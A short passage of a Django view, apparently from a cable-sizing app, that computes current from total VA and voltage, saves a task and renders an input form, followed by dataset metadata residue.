task.corrente_a = (task.total_va / task.tensa_va)
#queda = task.sessao_condutor
#test = main.read_sql_queda(queda)
#task.queda_tensao_ckt = ((((test['queda_tesao'] * task.corrente_a) * task.comprimento) / 1000) / task.total_va)
task.save()
return redirect('/')
else:
form = ResidencDimensForm()
return render(request, 'cable/add-task.html', {'form': form})
'''
#urls ID
#https://stackoverflow.com/questions/15608295/passing-an-id-in-django-url
|
[
"noreply@github.com"
] |
AlexsandroMO.noreply@github.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.